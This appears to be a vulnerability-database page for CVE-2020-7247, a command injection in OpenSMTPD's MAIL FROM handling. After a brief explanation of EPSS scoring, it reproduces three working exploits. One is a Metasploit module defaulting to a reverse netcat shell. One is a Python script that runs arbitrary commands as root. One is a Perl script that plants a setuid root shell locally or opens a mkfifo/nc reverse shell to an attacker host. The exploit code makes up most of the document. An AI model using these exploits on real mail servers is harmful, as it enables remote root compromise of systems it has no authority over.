CVE-2020-7247 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Expect def initialize(info = {}) super(update_info(info, 'Name' => 'OpenSMTPD MAIL FROM Remote Code Execution', 'Description' => %q{ This module exploits a command injection in the MAIL FROM field during SMTP interaction with OpenSMTPD to execute code as the root user. }, 'Author' => [ 'Qualys', # Discovery and PoC 'wvu', # Module 'RageLtMan <rageltman[at]sempervictus>' # Module ], 'References' => [ ['CVE', '2020-7247'], ['URL', 'https://www.openwall.com/lists/oss-security/2020/01/28/3'] ], 'DisclosureDate' => '2020-01-28', 'License' => MSF_LICENSE, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Privileged' => true, 'Targets' => [ ['OpenSMTPD >= commit a8e222352f', 'MyBadChars' => "!\#$%&'*?`{|}~\r\n".chars ] ], 'DefaultTarget' => 0, 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_netcat'} )) register_options([ Opt::RPORT(25), OptString.new('RCPT_TO', [true, 'Valid mail recipient', 'root']) ]) register_advanced_options([ OptBool.new('ForceExploit', [false, 'Override check result', false]), OptFloat.new('ExpectTimeout', [true, 'Timeout for Expect', 3.5]) ]) end def check connect res = sock.get_once return CheckCode::Unknown unless res return CheckCode::Detected if res =~ /^220.*OpenSMTPD/ CheckCode::Safe rescue EOFError, Rex::ConnectionError => e vprint_error(e.message) CheckCode::Unknown ensure disconnect end def exploit unless datastore['ForceExploit'] unless check == CheckCode::Detected fail_with(Failure::Unknown, 'Set ForceExploit to override') end end # We don't care who we are, so randomize it me = rand_text_alphanumeric(8..42) # Send mail to this valid recipient to = datastore['RCPT_TO'] # Comment "slide" courtesy of Qualys - brilliant! iter = rand_text_alphanumeric(15).chars.join(' ') from = ";for #{rand_text_alpha(1)} in #{iter};do read;done;sh;exit 0;" # This is just insurance, since the code was already written if from.length > 64 fail_with(Failure::BadConfig, 'MAIL FROM field is greater than 64 chars') elsif (badchars = (from.chars & target['MyBadChars'])).any? fail_with(Failure::BadConfig, "MAIL FROM field has badchars: #{badchars}") end # Create the mail body with comment slide and payload body = "\r\n" + "#\r\n" * 15 + payload.encoded sploit = { nil => /220.*OpenSMTPD/, "HELO #{me}" => /250.*pleased to meet you/, "MAIL FROM:<#{from}>" => /250.*Ok/, "RCPT TO:<#{to}>" => /250.*Recipient ok/, 'DATA' => /354 Enter mail.*itself/, body => nil, '.' => /250.*Message accepted for delivery/, 'QUIT' => /221.*Bye/ } print_status('Connecting to OpenSMTPD') connect print_status('Saying hello and sending exploit') sploit.each do |line, pattern| send_expect( line, pattern, sock: sock, timeout: datastore['ExpectTimeout'], newline: "\r\n" ) end rescue Rex::ConnectionError => e fail_with(Failure::Unreachable, e.message) rescue Timeout::Error => e fail_with(Failure::TimeoutExpired, e.message) ensure disconnect end end

# Exploit Title: OpenSMTPD 6.6.1 - Remote Code Execution # Date: 2020-01-29 # Exploit Author: 1F98D # Original Author: Qualys Security Advisory # Vendor Homepage: https://www.opensmtpd.org/ # Software Link: https://github.com/OpenSMTPD/OpenSMTPD/releases/tag/6.6.1p1 # Version: OpenSMTPD < 6.6.2 # Tested on: Debian 9.11 (x64) # CVE: CVE-2020-7247 # References: # https://www.openwall.com/lists/oss-security/2020/01/28/3 # # OpenSMTPD after commit a8e222352f and before version 6.6.2 does not adequately # escape dangerous characters from user-controlled input. An attacker # can exploit this to execute arbitrary shell commands on the target. # #!/usr/local/bin/python3 from socket import * import sys if len(sys.argv) != 4: print('Usage {} <target ip> <target port> <command>'.format(sys.argv[0])) print("E.g. {} 127.0.0.1 25 'touch /tmp/x'".format(sys.argv[0])) sys.exit(1) ADDR = sys.argv[1] PORT = int(sys.argv[2]) CMD = sys.argv[3] s = socket(AF_INET, SOCK_STREAM) s.connect((ADDR, PORT)) res = s.recv(1024) if 'OpenSMTPD' not in str(res): print('[!] No OpenSMTPD detected') print('[!] Received {}'.format(str(res))) print('[!] Exiting...') sys.exit(1) print('[*] OpenSMTPD detected') s.send(b'HELO x\r\n') res = s.recv(1024) if '250' not in str(res): print('[!] Error connecting, expected 250') print('[!] Received: {}'.format(str(res))) print('[!] Exiting...') sys.exit(1) print('[*] Connected, sending payload') s.send(bytes('MAIL FROM:<;{};>\r\n'.format(CMD), 'utf-8')) res = s.recv(1024) if '250' not in str(res): print('[!] Error sending payload, expected 250') print('[!] Received: {}'.format(str(res))) print('[!] Exiting...') sys.exit(1) print('[*] Payload sent') s.send(b'RCPT TO:<root>\r\n') s.recv(1024) s.send(b'DATA\r\n') s.recv(1024) s.send(b'\r\nxxx\r\n.\r\n') s.recv(1024) s.send(b'QUIT\r\n') s.recv(1024) print('[*] Done')

# Exploit Title: OpenSMTPD 6.6.1 - Local Privilege Escalation # Date: 2020-02-02 # Exploit Author: Marco Ivaldi # Vendor Homepage: https://www.opensmtpd.org/ # Version: OpenSMTPD 6.4.0 - 6.6.1 # Tested on: OpenBSD 6.6, Debian GNU/Linux bullseye/sid with opensmtpd 6.6.1p1-1 # CVE: CVE-2020-7247 #!/usr/bin/perl # # raptor_opensmtpd.pl - LPE and RCE in OpenBSD's OpenSMTPD # Copyright (c) 2020 Marco Ivaldi <[email protected]> # # smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and # other products, allows remote attackers to execute arbitrary commands as root # via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL # FROM field. This affects the "uncommented" default configuration. The issue # exists because of an incorrect return value upon failure of input validation # (CVE-2020-7247). # # "Wow. I feel all butterflies in my tummy that bugs like this still exist. # That's awesome :)" -- skyper # # This exploit targets OpenBSD's OpenSMTPD in order to escalate privileges to # root on OpenBSD in the default configuration, or execute remote commands as # root (only in OpenSMTPD "uncommented" default configuration). # # See also: # https://www.qualys.com/2020/01/28/cve-2020-7247/lpe-rce-opensmtpd.txt # https://poolp.org/posts/2020-01-30/opensmtpd-advisory-dissected/ # https://www.kb.cert.org/vuls/id/390745/ # https://www.opensmtpd.org/security.html # # Usage (LPE): # phish$ uname -a # OpenBSD phish.fnord.st 6.6 GENERIC#353 amd64 # phish$ id # uid=1000(raptor) gid=1000(raptor) groups=1000(raptor), 0(wheel) # phish$ ./raptor_opensmtpd.pl LPE # [...] # Payload sent, please wait 5 seconds... # -rwsrwxrwx 1 root wheel 12432 Feb 1 21:20 /usr/local/bin/pwned # phish# id # uid=0(root) gid=0(wheel) groups=1000(raptor), 0(wheel) # # Usage (RCE): # raptor@eris ~ % ./raptor_opensmtpd.pl RCE 10.0.0.162 10.0.0.24 example.org # [...] # Payload sent, please wait 5 seconds... # /bin/sh: No controlling tty (open /dev/tty: Device not configured) # /bin/sh: Can't find tty file descriptor # /bin/sh: warning: won't have full job control # phish# id # uid=0(root) gid=0(wheel) groups=0(wheel) # # Vulnerable platforms (OpenSMTPD 6.4.0 - 6.6.1): # OpenBSD 6.6 [tested] # OpenBSD 6.5 [untested] # OpenBSD 6.4 [untested] # Debian GNU/Linux bullseye/sid with opensmtpd 6.6.1p1-1 [tested] # Other Linux distributions [untested] # FreeBSD [untested] # NetBSD [untested] # use IO::Socket::INET; print "raptor_opensmtpd.pl - LPE and RCE in OpenBSD's OpenSMTPD\n"; print "Copyright (c) 2020 Marco Ivaldi <raptor\@0xdeadbeef.info>\n\n"; $usage = "Usage:\n". "$0 LPE\n". "$0 RCE <remote_host> <local_host> [<domain>]\n"; $lport = 4444; ($type, $rhost, $lhost, $domain) = @ARGV; die $usage if (($type ne "LPE") && ($type ne "RCE")); # Prepare the payload if ($type eq "LPE") { # LPE $payload = "cp /bin/sh /usr/local/bin/pwned\n". "echo 'main(){setuid(0);setgid(0);system(\"/bin/sh\");}' > /tmp/pwned.c\n". "gcc /tmp/pwned.c -o /usr/local/bin/pwned\nchmod 4777 /usr/local/bin/pwned"; $rhost = "127.0.0.1"; } else { # RCE die $usage if ((not defined $rhost) || (not defined $lhost)); $payload = "sleep 5;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|". "nc $lhost $lport >/tmp/f"; } # Open SMTP connection $| = 1; $s = IO::Socket::INET->new("$rhost:25") or die "Error: $@\n"; # Read SMTP banner $r = <$s>; print "< $r"; die "Error: this is not OpenSMTPD\n" if ($r !~ /OpenSMTPD/); # Send HELO $w = "HELO fnord"; print "> $w\n"; print $s "$w\n"; $r = <$s>; print "< $r"; die "Error: expected 250\n" if ($r !~ /^250/); # Send evil MAIL FROM $w = "MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>"; print "> $w\n"; print $s "$w\n"; $r = <$s>; print "< $r"; die "Error: expected 250\n" if ($r !~ /^250/); # Send RCPT TO if (not defined $domain) { $rcpt = "<root>"; } else { $rcpt = "<root\@$domain>"; } $w = "RCPT TO:$rcpt"; print "> $w\n"; print $s "$w\n"; $r = <$s>; print "< $r"; die "Error: expected 250\n" if ($r !~ /^250/); # Send payload in DATA $w = "DATA"; print "> $w\n"; print $s "$w\n"; $r = <$s>; print "< $r"; $w = "\n#0\n#1\n#2\n#3\n#4\n#5\n#6\n#7\n#8\n#9\n#a\n#b\n#c\n#d\n$payload\n."; #print "> $w\n"; # uncomment for debugging print $s "$w\n"; $r = <$s>; print "< $r"; die "Error: expected 250\n" if ($r !~ /^250/); # Close SMTP connection $s->close(); print "\nPayload sent, please wait 5 seconds...\n"; # Got root? if ($type eq "LPE") { # LPE sleep 5; print `ls -l /usr/local/bin/pwned`; exec "/usr/local/bin/pwned" or die "Error: exploit failed :(\n"; } else { # RCE exec "nc -vl $lport" or die "Error: unable to execute netcat\n"; # BSD netcat #exec "nc -vlp $lport" or die "Error: unable to execute netcat\n"; # Debian netcat }